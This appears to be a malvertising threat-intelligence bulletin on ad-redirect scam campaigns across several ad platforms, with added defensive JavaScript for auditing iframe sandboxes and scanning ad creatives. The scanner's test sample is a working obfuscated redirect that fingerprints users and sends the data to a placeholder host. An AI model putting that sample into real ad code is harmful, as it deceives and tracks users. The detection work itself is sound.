Assessment:  Over the past week, Boltive observed a malicious redirect campaign driving users to a fake landing page or an iPhone virus scam. The malicious ads used evasion techniques such as string reversal and string concatenation to avoid detection. Under favorable technical conditions these ads perform the redirect; otherwise they look benign, with no suspicious behavior indicators.

Affected Platform:  Pubmatic


Assessment:  Desktop redirect campaign impacting 1,300 domains. The malicious code relied on user input (such as a click or a scroll) to trigger the redirect. While this tactic is not new, it is a strategy that had been dormant for much of the year. Users were shown a fake McAfee antivirus popup prompting a download of further malicious code. The malicious ad code also attempted to remove important functionality from both the ad frame and the main frame, so every time the redirect did not fire there was still a risk that the page itself would break.

Interestingly, this campaign showed more sophistication in its code, collecting real-time data for analysis. The fraudsters added random sampling of the ads, indicating that they expected large volumes of traffic and planned to optimize their campaigns based on what they learned. Like many others, the campaign checked for the presence of blocking wrappers, in this case ADL and two other competitors. This is something we expect and have protection against, a nuance that all publishers and platforms should confirm with their providers.
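Because the redirect in this campaign is armed only by user input, the sandbox policy a publisher puts on its ad iframes matters. The following JavaScript is an added example, not Boltive's or ADL's code: it evaluates what an iframe's standard HTML `sandbox` keywords allow and audits the ad frames in a page. The sample markup, frame ids and the `ads.example.invalid` hosts are constructed.

```javascript
// Added example (not Boltive/ADL code): audit the sandbox policy applied to ad iframes.
// Uses only the standard HTML sandbox keywords; the sample page below is constructed.

// Returns when a frame with the given sandbox attribute may navigate the top-level page.
// `null` means the iframe has no sandbox attribute at all.
function topNavigationPolicy(sandboxAttr) {
  if (sandboxAttr == null) return 'always';
  const tokens = new Set(sandboxAttr.toLowerCase().split(/\s+/).filter(Boolean));
  if (tokens.has('allow-top-navigation')) return 'always';
  if (tokens.has('allow-top-navigation-by-user-activation')) return 'on-user-activation';
  return 'never';
}

// A sandbox that still lets a legitimate creative run its script and open its landing
// page in a new tab on click, while denying navigation of the page that hosts it.
// allow-same-origin is deliberately omitted: combined with allow-scripts it would let
// same-origin content remove the sandbox.
const HARDENED_AD_SANDBOX = 'allow-scripts allow-popups allow-popups-to-escape-sandbox';

// Extract each <iframe> in the markup with its src and sandbox attribute and report
// whether its policy stops a redirect that fires on a click inside the ad.
function auditAdFrames(html) {
  const frames = [];
  const iframeRe = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = iframeRe.exec(html)) !== null) {
    const attrs = m[1];
    const src = (attrs.match(/\bsrc\s*=\s*["']([^"']*)["']/i) || [])[1] || '';
    const sb = attrs.match(/\bsandbox\s*(?:=\s*["']([^"']*)["'])?/i);
    const sandboxAttr = sb ? (sb[1] || '') : null; // a bare `sandbox` is fully restricted
    const policy = topNavigationPolicy(sandboxAttr);
    frames.push({
      src,
      sandboxAttr,
      topNavigation: policy,
      // A click on the creative counts as user activation, so
      // allow-top-navigation-by-user-activation does not stop click-triggered redirects.
      blocksInteractionTriggeredRedirect: policy === 'never',
    });
  }
  return frames;
}

// Constructed sample page with three ad slots.
const SAMPLE_PAGE = `
<iframe id="slot-a" src="https://ads.example.invalid/a"></iframe>
<iframe id="slot-b" src="https://ads.example.invalid/b" sandbox="allow-scripts allow-top-navigation-by-user-activation"></iframe>
<iframe id="slot-c" src="https://ads.example.invalid/c" sandbox="${HARDENED_AD_SANDBOX}"></iframe>
`;

for (const frame of auditAdFrames(SAMPLE_PAGE)) {
  console.log(frame.src, frame.topNavigation, frame.blocksInteractionTriggeredRedirect);
}
```

Only `slot-c` reports `blocksInteractionTriggeredRedirect: true`; `slot-b` looks hardened but still lets a redirect through once the user clicks the ad, which is exactly the trigger this campaign waited for. Scroll events, by contrast, are not user activation, so `slot-b` does block a scroll-gated redirect.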

Affected platforms:  Early intelligence pointed to ReklamStore as the source of the redirects; however, ADL confirmed that Yieldmo was in fact the platform most impacted by this outbreak.

Assessment:  This malicious campaign has two methods of triggering the redirect. The first writes a script tag that loads a jQuery file from http://ajax.googleapis.com, then runs a function that replaces parts of the URL to build the malicious payload URL and sends along fingerprinting information (screen width/height, platform, user agent, color depth, number of plugins, timestamp, etc.). The second loads a hidden iframe whose source executes JavaScript that attempts a top.location.replace.
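The indicators described across these assessments (string reverse and concat obfuscation, interaction-gated triggers, a hidden iframe attempting top-level navigation, client fingerprinting, jQuery loaded from ajax.googleapis.com) can be turned into a static pre-screen of creative source. The JavaScript below is an added example and not Boltive's or ADL's scanner: the regular expressions, weights and verdict thresholds are assumptions, and the two creatives are constructed samples whose `example.invalid` hosts are placeholders.

```javascript
// Added example (not Boltive/ADL code): heuristic static scan of ad creative source for
// the redirect-campaign indicators described above. Regexes, weights and thresholds are
// assumptions chosen for illustration.

// Properties the campaign collected for fingerprinting; three or more referenced in one
// creative is treated as a fingerprinting indicator.
const FINGERPRINT_PROPS = [
  'screen.width', 'screen.height', 'screen.colorDepth', 'navigator.platform',
  'navigator.userAgent', 'navigator.plugins.length', 'Date.now()',
];

const INDICATORS = [
  // x.split('').reverse().join('') rebuilds a string that was stored backwards
  { id: 'string-reverse', weight: 3,
    re: /\.split\(\s*(['"])\1\s*\)\s*\.reverse\(\s*\)\s*\.join\(/ },
  // five or more very short literals glued with '+', e.g. 'p' + 'la' + 'tf' + 'or' + 'm'
  { id: 'string-concat', weight: 2,
    re: /(?:(['"])[^'"]{1,4}\1\s*\+\s*){4,}(['"])[^'"]{1,4}\2/ },
  // navigation of the hosting page from inside the ad frame
  { id: 'top-navigation', weight: 4,
    re: /\b(?:top|parent)\s*\.\s*location\b/ },
  // iframe hidden by zero size or by style
  { id: 'hidden-iframe', weight: 3,
    re: /<iframe\b[^>]*(?:display\s*:\s*none|visibility\s*:\s*hidden|\b(?:width|height)\s*=\s*["']?0\b)/i },
  // redirect armed only after user input, the tactic seen in the 1,300-domain campaign
  { id: 'interaction-gated', weight: 2,
    re: /addEventListener\(\s*['"](?:click|scroll|touchstart|mousemove|wheel)['"]/ },
  // jQuery pulled from the Google CDN: common in benign creatives, hence the low weight
  { id: 'remote-jquery', weight: 1,
    re: /ajax\.googleapis\.com\/ajax\/libs\/jquery/ },
];

function countFingerprintProps(src) {
  return FINGERPRINT_PROPS.filter((p) => src.includes(p)).length;
}

// Returns the matched indicator ids, a weighted score and a verdict for one creative.
function scanCreative(src) {
  const hits = [];
  let score = 0;
  for (const ind of INDICATORS) {
    if (ind.re.test(src)) { hits.push(ind.id); score += ind.weight; }
  }
  const fp = countFingerprintProps(src);
  if (fp >= 3) { hits.push(`fingerprinting(${fp})`); score += 3; }
  const verdict = score >= 6 ? 'block' : score >= 3 ? 'review' : 'allow';
  return { score, hits, verdict };
}

// Constructed samples: a plain image creative, and one carrying the indicators above.
const BENIGN_CREATIVE = `
<a href="https://example.invalid/landing"><img src="https://cdn.example.invalid/banner.jpg" width="300" height="250"></a>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
`;

const SUSPICIOUS_CREATIVE = `
<img src="https://cdn.example.invalid/logo.png">
<iframe src="https://example.invalid/f" width="0" height="0" style="display:none"></iframe>
<script>
  var p = 'p' + 'la' + 'tf' + 'or' + 'm';
  var d = "gnidnal/dilavni.elpmaxe//:sptth".split('').reverse().join('');
  var q = [screen.width, screen.height, screen.colorDepth, navigator.platform,
           navigator.userAgent, navigator.plugins.length, Date.now()].join('|');
  document.addEventListener('scroll', function () { top.location.replace(d + '?f=' + q); });
</script>
`;

for (const [name, src] of [['benign', BENIGN_CREATIVE], ['suspicious', SUSPICIOUS_CREATIVE]]) {
  console.log(name, scanCreative(src));
}
```

A static pre-screen like this only catches what is visible in the delivered source; the first campaign above behaved benignly unless conditions were favorable, so it complements rather than replaces runtime blocking in the ad frame.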

The ad loaded alongside this malicious payload is a simple image (either a logo or a stolen Amazon Fire TV Stick ad) that actually takes the user to an Amazon listing for a Fire TV Stick.

There appear to be two different campaigns active at the moment: one leading to healthnotetoday(dot)com and the other leading to various gift card scam pages.

Affected Platforms:  GumGum (buyer has been blocked) & Between Digital

Assessment:  Fraudsters hosting obfuscated scripts on AWS and Yahoo platforms attempted to deliver malicious redirects to over 300 different domains. To date, over 600M bad ads have been stopped and remonetized, primarily on mobile devices.

Affected Platforms:  InMobi

Assessment:  Redirect campaign spanning almost 1,500 sites over the past 7 days. The creative automatically drove mobile and desktop users to sites such as inboxfunpoints[dot]com, 7daynews[dot]com and foxnewstoday[dot]com. ADL protected over 4.5M ads during the attack.

Affected platforms:  Yieldmo, ReklamStore DSP

